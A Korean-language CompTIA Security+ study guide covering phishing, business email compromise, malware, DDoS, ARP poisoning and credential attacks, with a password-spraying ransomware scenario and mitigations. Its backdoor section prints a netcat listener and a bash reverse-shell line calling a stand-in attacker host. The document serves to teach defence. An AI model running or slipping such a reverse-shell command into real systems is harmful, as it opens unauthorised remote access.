CompTIA SY0-701: 위협, 공격 및 취약점 — 학습 가이드
다음의 일부입니다: CompTIA Security+ SY0-701 — 학습 가이드. 검증된 답안으로 연습하기: CompTIA 시험 허브, 또는 다음에서 시간 제한 모의고사 풀기: ExamRoll.io.
현대의 위협 환경은 기술적 취약점 공격과 인간 심리 조작을 결합하고, 심각도가 낮은 여러 약점을 연결하여 파급력이 큰 침해 사고로 발전시키며, 합법적인 비즈니스 프로세스 안에 자신들의 활동을 위장하는 공격자들에 의해 정의됩니다. 위협을 이해하는 것은 의도, 능력, 벡터를 이해하는 것에서 시작되며, 표면적인 증상을 전체 설명으로 받아들이기를 거부하는 데서 출발합니다.
사회 공학 및 피싱 변종
사회 공학은 소프트웨어 결함보다는 신뢰, 긴급성, 권위 또는 호기심을 이용합니다. 전통적인 피싱은 이메일을 통해 광범위한 그물을 던지는 방식으로, 가짜 배송 알림이나 비밀번호 재설정 요청과 같은 일반적인 미끼를 수천 명의 수신자에게 보냅니다. 스피어 피싱은 공격 범위를 좁혀, LinkedIn, 기업 웹사이트 또는 유출 정보 덤프에서 정찰한 정보를 사용하여 특정 개인이나 부서에 맞춤화된 메시지를 작성합니다. 웨일링은 임원을 표적으로 삼는데, 외부 법률 고문이 보낸 것처럼 조작된 메시지를 받는 CFO가 전형적인 표적입니다. 이들의 권한은 더 큰 규모의 사기를 가능하게 하기 때문입니다.
채널 변종은 동일한 조작 수법을 다른 매체로 확장합니다. 비싱(보이스 피싱)은 전화 통화를 사용하며, 종종 발신자 ID를 스푸핑하고 IT 헬프데스크를 사칭하여 MFA 코드를 빼내는 것과 같은 구실을 사용합니다. 스미싱은 SMS를 사용하며, 단축 URL과 “배송물을 전달할 수 없었습니다 - 여기서 일정을 다시 잡으세요"와 같은 모바일 특화 미끼를 자주 활용합니다. 모바일 브라우저는 URL을 잘라내고 인증서 세부 정보를 숨기기 때문에, 스미싱은 불균형적으로 높은 성공률을 보입니다.
**비즈니스 이메일 침해(BEC)**는 일반적으로 악성코드를 전혀 포함하지 않기 때문에 특별한 주의가 필요합니다. 합법적인 메일함을 탈취했거나 유사한 도메인(accounts@vendor-corp.com 대신 accounts@vend0r-corp.com)을 스푸핑한 공격자가 실제 청구서 스레드에 끼어들어 계좌 이체를 다른 곳으로 유도합니다. 이메일 내용이 문맥상 정확하고 첨부 파일이 없기 때문에, 게이트웨이 안티-멀웨어나 URL 샌드박싱은 거의 보호를 제공하지 못합니다. FBI의 IC3는 단일 연도에 BEC로 인한 손실이 29억 달러를 초과했다고 보고했으며, 이는 다른 사이버 범죄 유형과 큰 격차를 보이는 최고액입니다.
흔한 함정은 양호해 보이는 증상을 과대 해석하는 것입니다. 사용자가 피싱 사이트에 자격 증명을 제출하고 “페이지를 찾을 수 없음” 오류를 받았을 때, 이는 사건이 해결된 것이 아닙니다. 이는 공격자가 자격 증명을 획득한 후 피해자를 다른 곳으로 리디렉션한, 완료된 자격 증명 수집입니다. 명백한 오류 페이지가 없는 것은 공격의 실패 증거가 아니라 공격의 특징입니다.
악성코드 유형
악성코드는 단일한 유형이 아닙니다. 랜섬웨어는 데이터를 암호화하고 금전을 요구하며, Ryuk, Conti, LockBit과 같은 최신 변종들은 이중 갈취를 위해 먼저 데이터를 유출하기도 합니다. 파일이 .ryk, .locked 또는 임의의 문자열로 이름이 바뀌는 대량의 파일 확장자 변경과 모든 디렉터리에 README.txt 또는 HOW_TO_DECRYPT.html이라는 이름의 랜섬 노트가 함께 나타나는 것이 뚜렷한 지표입니다.
루트킷은 훨씬 더 깊은 수준에서 작동하여, 커널 구조, 시스템 콜 테이블 또는 펌웨어(부트킷, UEFI 임플란트)를 후킹하여 운영 체제 자체로부터 프로세스, 파일, 네트워크 연결을 숨깁니다. 표준 도구들은 루트킷이 제어하는 커널에 질의하기 때문에 tasklist나 ps의 출력을 신뢰할 수 없습니다. 탐지는 일반적으로 오프라인 포렌식 이미징이나, chkrootkit 또는 Volatility를 사용한 메모리 분석과 같은 도구를 통해 알려진 정상 기준선과 비교해야 합니다.
백도어는 지속적인 무단 접근을 제공하며, 종종 초기 침투 후에 설치됩니다. 이는 명령 제어(C2) 서버로 비콘을 보내는 예약된 작업, 애플리케이션에 삽입된 하드코딩된 자격 증명, 또는 잘 알려지지 않은 포트에서 수신 대기하는 서비스의 형태를 띨 수 있습니다. Netcat이나 Meterpreter와 같은 도구를 사용하는 리버스 셸이 일반적입니다.
# Attacker listener
nc -lvnp 4444
# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1
여기서의 함정은 초기 대응 시의 터널 비전입니다. ‘악성코드 탐지’ 경고가 발생하여 신속하게 격리되었다고 해서 사건이 끝난 것은 아닙니다. 초기 드로퍼가 이미 백도어를 설정했거나 엔드포인트 에이전트가 볼 수 없는 루트킷을 설치했을 수 있습니다.
네트워크 공격
분산 서비스 거부(DDoS) 공격은 가용성을 목표로 합니다. 볼륨 기반 공격(UDP 플러드, ICMP 플러드)은 원시 대역폭을 소모합니다. 반사/증폭 공격은 요청보다 큰 페이로드로 응답하는 제3자 서비스를 악용합니다. 스푸핑된 소스 주소를 가진 60바이트의 DNS 쿼리가 3,000바이트의 응답을 반환할 수 있으며, NTP monlist나 memcached 증폭은 50,000배 이상의 비율을 달성할 수 있습니다. 공개 웹 서비스가 서버에서는 ‘정상’ 상태이지만 인터넷에서 접근할 수 없고 네트워크 로그에 트래픽 급증이 보인다면, 그 원인은 거의 항상 애플리케이션 버그가 아니라 업스트림 링크나 상태 테이블을 포화시키는 DDoS 공격입니다.
경로상 공격(이전에는 ‘중간자 공격’으로 불림)은 공격자를 통신하는 두 당사자 사이에 위치시킵니다. 로컬 네트워크에서는 ARP 포이즈닝이 일반적인 메커니즘입니다. 공격자는 게이트웨이의 IP를 소유하고 있다고 주장하는 비요청 ARP 응답을 보내 피해자의 트래픽이 조용히 공격자의 호스트를 통해 라우팅되도록 합니다. ettercap이나 arpspoof와 같은 도구들이 이를 자동화하며, 그 후 공격자는 sslstrip으로 TLS를 제거하거나 콘텐츠를 주입할 수 있습니다.
타이포스쿼팅은 goggle.com, paypa1.com과 같이 합법적인 도메인을 모방한 도메인을 등록하여, 잘못 입력된 URL을 포착하거나 피싱 및 BEC를 위한 설득력 있는 인프라 역할을 합니다.
자격 증명 공격
자격 증명 공격은 코드 취약점을 이용하는 대신, 취약한 인증을 공격합니다. **브루트 포스(Brute force)**는 하나의 계정에 대해 가능한 모든 암호를 시도하는 방식으로, 탐지되기 쉽고(loud) 계정 잠금 정책을 유발합니다. **패스워드 스프레이(Password spraying)**는 이 모델을 뒤집습니다. 즉, Winter2024!나 Password123과 같이 매우 흔한 암호 한두 개를 수천 개의 계정에 시도하여 단일 계정에 대한 잠금 임계값 미만을 유지합니다. 이 방법은 클라우드 ID 공급자에 MFA를 적용하지 않은 조직에 매우 효과적입니다.
**크리덴셜 스터핑(Credential stuffing)**은 이전 유출 사고에서 수집한 사용자 이름/암호 쌍을 재사용하여 여러 서비스에 걸쳐 암호를 재사용하는 약점을 악용합니다. 이 자격 증명은 적어도 하나의 서비스에서는 유효하기 때문에 기본적인 인증 제어를 우회합니다. 2022년 Okta 유출 사고는 지원 계약 업체의 계정에 대한 크리덴셜 스터핑으로 시작되었습니다. 이는 모든 권한 있는 액세스 경로에 MFA가 강제되지 않으면 ID 공급자조차도 안전하지 않다는 것을 보여줍니다.
Pass-the-hash 및 pass-the-ticket 공격은 암호를 크래킹하는 대신 메모리에서 인증 자료를 탈취합니다. Windows 시스템에서는 Mimikatz를 사용하여 LSASS 메모리에 저장된 NTLM 해시를 추출하고, 이를 재사용하여 평문 암호를 몰라도 다른 시스템에 인증할 수 있습니다. Kerberos TGT(Ticket-Granting Ticket)도 유사하게 도난당하고 재사용될 수 있습니다. 완화 조치로는 Credential Guard(가상화 기반 보안 엔클레이브에 LSASS를 격리), Protected Users 보안 그룹 멤버십, 그리고 Kerberos를 사용할 수 있는 경우 NTLM을 비활성화하는 것이 있습니다.
실전 시나리오: 패스워드 스프레이를 통한 랜섬웨어
직원 2,400명 규모의 한 물류 회사가 Microsoft 365 테넌트에 MFA를 강제하지 않았습니다. 공격자는 3일에 걸쳐 LinkedIn에서 수집한 모든 알려진 이메일 주소에 대해 Summer2023!라는 암호를 테스트하는 패스워드 스프레이 공격을 수행했습니다. 41개의 계정이 일치했습니다. 공격자는 탈취된 계정 중 하나인 지역 관리자 계정을 사용하여 M365 자격 증명을 허용하는 회사 VPN에 액세스했습니다. VPN을 통해 공격자는 2주 동안 내부 정찰을 수행하며 백업 서버와 도메인 컨트롤러를 식별했습니다. 한 금요일 저녁, 340대의 서버에 LockBit 랜섬웨어가 실행되었습니다. 복구에는 19일이 걸렸으며, 랜섬머니, 포렌식, 수익 손실을 포함하여 약 410만 달러의 비용이 발생했습니다. 이 모든 공격 체인은 단 하나의 누락된 통제, 즉 M365 테넌트의 MFA 미적용 때문에 가능했습니다. 패스워드 스프레이는 탐지가 가능합니다. 단일 IP에서 발생하는 여러 계정에 대한 실패한 인증을 연관시키는 SIEM 규칙이 있었다면 첫날에 이를 탐지했을 것입니다.
← 신원 및 접근 관리 · 모든 도메인 · 네트워크 보안 및 아키텍처 →
이 문제 연습하기 → · ExamRoll.io에서 시간 제한 연습 →
Pass the whole exam — not just this question
You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.
시험 합격하기 →